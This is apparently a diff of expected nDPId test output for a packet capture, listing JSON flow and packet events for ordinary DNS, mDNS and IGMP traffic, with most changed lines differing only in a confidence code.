-00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168075664,"flow_last_seen":1626168075675,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168075675,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"139.1.168.192.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1626168075664,"flow_last_seen":1626168075681,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1626168075681,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"60.21.149.52.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1626168075664,"flow_last_seen":1626168075665,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168075665,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"139.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168075664,"flow_last_seen":1626168075675,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168075675,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"139.1.168.192.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1626168075664,"flow_last_seen":1626168075681,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1626168075681,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"60.21.149.52.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1626168075993,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1626168075993,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1626168075993,"pkt":"AQBeAAD76qnehSPOCABFAAB0G+EAAP8R\/GjAqAGL4AAA+xTpFOkAYH4FAAAAAAACAAAAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEAACkFoAAAEZQAEgAEAA4Aumq\/a01YO+qp3oUjzg=="} -00702{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1626168075993,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} +00702{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1626168075993,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1626168075993,"l3_proto":"ip6","src_ip":"fe80::1059:a858:f9e7:cf94","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1626168075993,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":150,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":150,"pkt_l4_len":96,"thread_ts_msec":1626168075993,"pkt":"MzMAAAD76qnehSPOht1gCggAAGAR\/\/6AAAAAAAAAEFmoWPnnz5T\/AgAAAAAAAAAAAAAAAAD7FOkU6QBgoIcAAAAAAAIAAAAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQAAKQWgAAARlAASAAQADgC6ar9rTVg76qnehSPO"} -00711{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1626168075993,"l3_proto":"ip6","src_ip":"fe80::1059:a858:f9e7:cf94","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} +00711{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1626168075993,"l3_proto":"ip6","src_ip":"fe80::1059:a858:f9e7:cf94","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1626168076015,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00910{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1626168076015,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1626168076015,"pkt":"6qnehSPO8BiYFWV8CABFAAFxqZwAAP8RjIrAqAF5wKgBixTpFOkBXfEmAACEAAAAAAEAAAAFD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUAAgFTUJQcm\/ADMAyACGAAQAAAHgADgAAAADN8QVNQlByb8AhwDIAEIABAAARlAB3EXJwSE49ZWYzZjBmMDE0OThlDHJwRmw9MHgyMDAwMApycFZyPTIxMC40EXJwSEE9NjM4Y2VmMTVmYTJiEXJwQUQ9YzJlYTRjNWFjZmVlEXJwSEk9MmRiM2M5NTVjZDgyFnJwQkE9NTM6REQ6Qjk6MDY6QjU6MDAFTUJQcm8MX2RldmljZS1pbmZvwBwAEAABAAARlAAzFG1vZGVsPU1hY0Jvb2tQcm8xNCwxCm9zeHZlcnM9MjASZWNvbG9yPTIyNSwyMjUsMjIzwEwAHIABAAAAeAAQ\/oAAAAAAAAAIKbjnNzdtvsBMAAGAAQAAAHgABMCoAXk="} -00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1626168076015,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} +00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1626168076015,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1626168076607,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1626168076607,"pkt":"AQBeAAAC6qnehSPOCABGAAAgeZkAAAECCQnAqAGL4AAAApQEAAAXAAgE4AAA+w=="} -00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1626168076607,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1626168076607,"pkt":"AQBeAAD76qnehSPOCABGAAAgaRwAAAECGI3AqAGL4AAA+5QEAAAWAAkE4AAA+w=="} -00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1626168077017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":150,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":150,"pkt_l4_len":116,"thread_ts_msec":1626168077017,"pkt":"AQBeAAD76qnehSPOCABFAACI8IoAAP8RJ6vAqAGL4AAA+xTpFOkAdC8RAAAAAAACAAEAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEIX2hvbWVraXTAHAAMAAHADAAMAAEAABGUAAgFTUJQcm\/ADAAAKQWgAAARlAASAAQADgC6ar9rTVg76qnehSPO"} 00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1626168077017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":170,"pkt_l4_len":116,"thread_ts_msec":1626168077017,"pkt":"MzMAAAD76qnehSPOht1gCggAAHQR\/\/6AAAAAAAAAEFmoWPnnz5T\/AgAAAAAAAAAAAAAAAAD7FOkU6QB0UZMAAAAAAAIAAQAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAwAAQhfaG9tZWtpdMAcAAwAAcAMAAwAAQAAEZQACAVNQlByb8AMAAApBaAAABGUABIABAAOALpqv2tNWDvqqd6FI84="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077413,"flow_last_seen":1626168077413,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1626168077413,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1626168077413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077413,"pkt":"WNVuaKQA8BiYFWV8CABFAABAe7EAAEARLMvAqAF5CAgICNkPADUALCfrXeUBAAABAAAAAAAABHdkY3AJbWljcm9zb2Z0A2NvbQAAQQAB"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077413,"flow_last_seen":1626168077413,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1626168077413,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077413,"flow_last_seen":1626168077413,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1626168077413,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077415,"flow_last_seen":1626168077415,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1626168077415,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1626168077415,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077415,"pkt":"WNVuaKQA8BiYFWV8CABFAABA7DEAAEARvErAqAF5CAgICNJ8ADUALMmVww0BAAABAAAAAAAABHdkY3AJbWljcm9zb2Z0A2NvbQAAAQAB"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077415,"flow_last_seen":1626168077415,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1626168077415,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077415,"flow_last_seen":1626168077415,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1626168077415,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1626168077439,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1626168077439,"pkt":"8BiYFWV8WNVuaKQACABFAAC9hRIAAHgR6uwICAgIwKgBeQA10nwAqSezww2BgAABAAMAAAAABHdkY3AJbWljcm9zb2Z0A2NvbQAAAQABwAwABQABAAANmgAfCndkLXByb2QtY3AOdHJhZmZpY21hbmFnZXIDbmV0AMAwAAUAAQAAARUANhh3ZC1wcm9kLWNwLWV1LW5vcnRoLTItZmULbm9ydGhldXJvcGUIY2xvdWRhcHAFYXp1cmXAG8BbAAEAAQAAAAQABChxCi8="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077415,"flow_last_seen":1626168077439,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1626168077439,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.113.10.47"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077415,"flow_last_seen":1626168077439,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1626168077439,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.113.10.47"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077441,"flow_last_seen":1626168077441,"flow_idle_time":200000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168077441,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 